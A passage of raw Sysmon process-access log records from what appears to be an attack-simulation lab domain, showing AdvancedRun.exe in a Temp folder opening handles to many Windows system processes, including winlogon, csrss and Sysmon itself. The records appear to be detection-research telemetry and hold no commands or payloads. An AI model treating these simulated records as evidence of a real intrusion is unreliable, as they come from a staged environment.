LL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968276Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.716{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBF-61E7-E300-000000002402}4104C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968275Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.716{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBF-61E7-E200-000000002402}2056C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968274Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.716{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBC-61E7-DF00-000000002402}908C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000002968273Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.715{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBC-61E7-DD00-000000002402}4000C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968272Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.715{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBC-61E7-DC00-000000002402}2092C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968271Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.715{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0B37-61E7-8500-000000002402}500C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000002968270Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.715{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AC0-61E7-4300-000000002402}3476C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968269Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.714{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AC0-61E7-3F00-000000002402}3388C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968268Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.714{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABF-61E7-3800-000000002402}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968267Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.714{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABE-61E7-3000-000000002402}2304C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968266Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.713{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABE-61E7-2E00-000000002402}3044C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968265Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.713{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABE-61E7-2D00-000000002402}3032C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968263Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.712{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABE-61E7-2C00-000000002402}2984C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968262Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.712{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABE-61E7-2B00-000000002402}2976C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968261Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.712{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABD-61E7-2A00-000000002402}2960C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968260Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.712{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABD-61E7-2900-000000002402}2948C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968259Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.712{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABD-61E7-2800-000000002402}2836C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\Advanc